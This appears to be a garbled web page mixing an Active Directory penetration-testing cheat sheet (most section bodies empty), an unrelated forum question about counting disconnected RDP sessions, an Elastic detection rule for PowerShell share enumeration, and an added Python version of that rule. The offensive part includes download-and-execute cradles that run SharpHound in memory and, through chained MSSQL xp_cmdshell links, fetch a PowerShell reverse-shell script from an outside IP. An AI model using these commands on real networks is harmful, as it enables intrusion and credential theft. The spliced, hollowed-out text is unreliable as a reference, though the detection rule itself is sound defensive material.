Scanning and rewriting using PowerShell

This page is a long term work in progress page and will be subject to multiple changes overtime.

Local System Enumeration


# With API Call

Domain Group Enumeration

# Identify Privileged accounts without querying groups

If Constrained Language mode is enabled on the target Domain Controller, Powerview will be heavily restricted for Domain enumeration. However, the AD PowerShell module will not be limited and allow Domain enumeration to continue.

# Standard local execution




# Specify different domain and run in stealth mode and collect only RDP data

# Download and execute in memory
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('http://<IP>:/SharpHound.ps1');Invoke-BloodHound"

Add the queries below into BloodHound to run further queries.

Replace the customqueries.json with one of the above files to update the custom queries within Bloodhound. Remember to restart Bloodhound after changing the JSON file.

Locate custom queries file

sudo find / -type f -name customqueries.json 2>/dev/null

Note: Keep in mind that Bloodhound captures a ‘snapshot’ of the current state of Active Directory at the time of capture and as such results may change when captured again in the future.

I am building out a PowerShell script to return the number of disconnected sessions on a Windows server. I’m running into an issue where I can query the sessions on a server but can’t enumerate them into a counter.

For starters I query the active sessions:

query user /server:$SERVER
 USERNAME       SESSIONNAME        ID  STATE   IDLE TIME  LOGON TIME
 user1                              5  Disc     10+14:30  8/3/2023 12:23 PM
 user2                              6  Disc     10+13:38  8/3/2023 6:15 PM
 user3                             10  Disc      5+01:03  8/9/2023 8:27 AM
>iamtheadmin    rdp-tcp#3          14  Active          .  8/14/2023 9:47 AM

Great! Next I try to take the results and convert them into an integer that I can use to do other things (shutdown, reboot, send a notification, etc).

# Capture the output of "query user" as an array of lines ($SERVER is set earlier);
# this assignment was missing, so $sessionInfo was empty and the count never changed
$sessionInfo = query user /server:$SERVER

# Initialize a counter for disconnected sessions
$disconnectedSessionCount = 0

# Iterate through each line of the session information
foreach ($line in $sessionInfo) {
    # Disconnected sessions have an empty SESSIONNAME column, so splitting on
    # whitespace shifts the field positions; match the numeric ID followed by
    # the STATE column instead of relying on a fixed word index
    if ($line -match '\s\d+\s+Disc\s') {
        # Increment the disconnected session counter
        $disconnectedSessionCount++
    }
}

# Output the number of disconnected sessions
Write-Host "Number of Disconnected Sessions: $disconnectedSessionCount"

I attempted to write a script that enumerates the number of disconnected sessions on a Windows server. Unfortunately, I always get the same result.

Domain Computer Enumeration

# List all computers in current Domain
# Ping all alive computers in current Domain
# List all computers with select Operating System
"Windows 10 Pro"



# Get Computer objects that have Unconstrained Delegation

# Domain Information
# Domain Policy Information

# Get Domain SID

Domain Controller Enumeration

# Get all Domain Controllers
# Get Primary Domain Controller
# Get Domain Controller in different Domain

Domain Policy Enumeration

Domain Trust Enumeration

# Enumerate all Domains in the forest
# Get all Domains in Forest then list each Domain trust
# Map all reachable Domain trusts
# List external trusts
# Enumerate trusts across the domain

# Get details about current Forest

# Get all Domains in current Forest

# Get global catalogs in current Forest

# Map Forest trusts

# List all Groups in current Domain
# List all Groups in alternative Domain

# Search for Groups with partial wildcard
# List all local groups on Domain system

# Identify interesting groups on a Domain Controller
# Get all domain controllers then get each group and list members
# Get All groups and members of groups

Group Managed Service Accounts

# Enumerate GMSA accounts

# AD Module

# AD Module

Group Policy Enumeration

# Get GPOs in Domain

# Get GPO applied to specific OU

# Get each OU and enumerate GPOs applied to each
# Get GPO applied to system

# Get GPO Restricted Groups
# Get GPO Restricted Groups and list each member of the groups

# Get GPO Permissions

Find GPOs vulnerable to takeover

# Search for GPOs which may be vulnerable to takeover
# Resolve the SID to identify the principal
# Resolve the SID

Organizational Units Enumeration

# Get all OUs in Domain

# Get all OU names by wildcard



Access Control Lists

# Get current domain SID and find interesting properties
# Get ACLs for specific AD Object


# Get ACLs for specified prefix
# Search for interesting ACEs
# Get ACLs for select groups
# Find Interesting ACLs from groups we are a member of
# Get ACL for specific path

# Get the ACLs associated with the specified LDAP path to be used for search

AppLocker / WDAC

# Search local system to see if AppLocker is used. An error will occur if not in use
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
# Search for AppLocker policy with PowerShell on the local system
# Check local system to see if WDAC is installed

# Search for GPOs that might be related to AppLocker

# Ensure the Base path below is set to the root of the domain

Delegation – Constrained

# Get computer Constrained Delegation

Delegation – Unconstrained

# Get computers with unconstrained delegation

'isDeleted -eq $true'

Machine Account Quota



# Discover SQL related groups

# Discovery (SPN Scanning)
# Discovery (Broadcast Domain)
# Discovery (Broadcast Domain)
# Check Accessibility
# Search for database links to remote servers


# Execute commands ( If xp_cmdshell or RPC out is set to enabled)
# If AV is enabled run cradled scripts with functions inline with the script

"exec master..xp_cmdshell 'whoami'"
# Scan for misconfigurations and vulnerabilities

# Search for database links

# Manually searching for Database Links
'select * from master..sysservers'
# Openquery queries can be chained to access links within links (nested links)
'select * from openquery("<Server>",''select * from master..sysservers'')'
# From the initial SQL server, OS commands can be executed using nested link queries

MSSQL – PowerupSQL exploit example

Search for accessible instances in current domain




Run the Get-SQLServerLinkCrawl on an accessible instance.




From the results above the server mssql-master-srv is the enterprise level MSSQL server running with “sa” privileges. The path field shows, in order, how this server is reachable, starting with mssql-srv. We can check for command execution by specifying the first accessible instance in the path, which in this case is mssql-srv.

Get-SQLServerLinkCrawl -Instance "mssql-srv" -Query "exec master..xp_cmdshell 'whoami'"
Version     : SQL Server 2017
Instance    : mssql-master-srv
Links       :

With confirmed command execution under the “sa” account on the mssql-master-srv we can then connect remotely by executing a PowerShell download cradle.

Get-SQLServerLinkCrawl -Instance mssql-srv -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://<IP>/Invoke-PowerShellTcp.ps1'')"' -E df

# Get all file servers on Domain
# Individual examples
# Config files
# Bak files
# Unattend files
# Batch files
# PowerShell files
# DLL Config files
# SQL files
# Test files
# Password files
# Secret files
# Salary files
# Account files
Snaffler.exe -s -d Domain.local -o snaffler.log -v data

# Retrieve SPN hash




Native AD Module

PowerShell Share Enumeration Script

Rule type: query

Rule indices:

  • winlogbeat-*
  • logs-windows.powershell*

Risk score: 47

Runs every: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

Tags:

  • Domain: Endpoint
  • OS: Windows
  • Use Case: Threat Detection
  • Tactic: Discovery
  • Tactic: Collection
  • Tactic: Execution
  • Resources: Investigation Guide
  • Data Source: PowerShell Logs

Rule authors:

  • Elastic

Rule license: Elastic License v2

Investigation guide

Triage and analysis

Possible investigation steps

  • Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.
  • Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.
  • Contact the account owner and confirm whether they are aware of this activity.
  • Investigate other alerts associated with the user/host during the past 48 hours.
  • Evaluate whether the user needs to use PowerShell to complete tasks.
  • Check for additional PowerShell and command line logs that indicate that imported functions were run.
  • Evaluate which information was potentially mapped and accessed by the attacker.

False positive analysis

  • This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.

Response and remediation

  • Initiate the incident response process based on the outcome of the triage.
  • Isolate the involved hosts to prevent further post-compromise behavior.
  • Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
  • Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
  • Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
  • Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.
  • Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).

Steps to implement the logging policy with Advanced Audit Configuration:

Computer Configuration >
Administrative Templates >
Windows PowerShell >
Turn on PowerShell Script Block Logging (Enable)

Steps to implement the logging policy via registry:

reg add "hklm\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" /v EnableScriptBlockLogging /t REG_DWORD /d 1

Rule query

event.category:process and host.os.type:windows and
  powershell.file.script_block_text:(
    "Invoke-ShareFinder" or
    "Invoke-ShareFinderThreaded" or
    (
      "shi1_netname" and
      "shi1_remark"
    ) or
    (
      "NetShareEnum" and
      "NetApiBufferFree"
    )
  ) and not user.id : "S-1-5-18"
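The rule query above, re-implemented in Python as an added example (not part of the Elastic rule page) and run over constructed sample script-block events, so the match conditions and the S-1-5-18 exclusion can be checked offline. Field names follow the rule; the sample events and their `id` values are made up for the demo.

```python
# Added example: Python re-implementation of the Elastic rule query above,
# run over constructed sample events. Substring matching approximates KQL
# phrase matching on an analyzed text field (the real analyzer tokenizes).

def _has_all(text: str, *needles: str) -> bool:
    # Case-insensitive substring test for every needle
    lowered = text.lower()
    return all(n.lower() in lowered for n in needles)


def matches_share_enum_rule(event: dict) -> bool:
    """True when `event` satisfies the 'PowerShell Share Enumeration Script' query."""
    if event.get("event.category") != "process" or event.get("host.os.type") != "windows":
        return False
    if event.get("user.id") == "S-1-5-18":        # LocalSystem is excluded by the rule
        return False
    script = event.get("powershell.file.script_block_text", "")
    return (
        _has_all(script, "Invoke-ShareFinder")
        or _has_all(script, "Invoke-ShareFinderThreaded")
        # shi1_netname / shi1_remark are SHARE_INFO_1 fields, seen when
        # NetShareEnum is called through P/Invoke instead of PowerView
        or _has_all(script, "shi1_netname", "shi1_remark")
        or _has_all(script, "NetShareEnum", "NetApiBufferFree")
    )


def alerting_event_ids(events) -> list:
    # Return the ids of the events that would raise an alert
    return [e["id"] for e in events if matches_share_enum_rule(e)]


# Constructed sample script-block events (not real telemetry)
SAMPLE_EVENTS = [
    {"id": "evt-1", "event.category": "process", "host.os.type": "windows",
     "user.id": "S-1-5-21-1111-2222-3333-1001",
     "powershell.file.script_block_text": "Invoke-ShareFinder -CheckShareAccess"},
    {"id": "evt-2", "event.category": "process", "host.os.type": "windows",
     "user.id": "S-1-5-21-1111-2222-3333-1001",
     "powershell.file.script_block_text":
         "[DllImport('netapi32.dll')] NetShareEnum(...); NetApiBufferFree($buf)"},
    # Matching text but run as SYSTEM (S-1-5-18): excluded by the rule
    {"id": "evt-3", "event.category": "process", "host.os.type": "windows",
     "user.id": "S-1-5-18",
     "powershell.file.script_block_text": "Invoke-ShareFinderThreaded -Threads 20"},
    # Only one half of the shi1_* pair: does not match
    {"id": "evt-4", "event.category": "process", "host.os.type": "windows",
     "user.id": "S-1-5-21-1111-2222-3333-1002",
     "powershell.file.script_block_text": "Write-Host $share.shi1_netname"},
]

if __name__ == "__main__":
    print(alerting_event_ids(SAMPLE_EVENTS))   # ['evt-1', 'evt-2']
```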

Framework: MITRE ATT&CK™
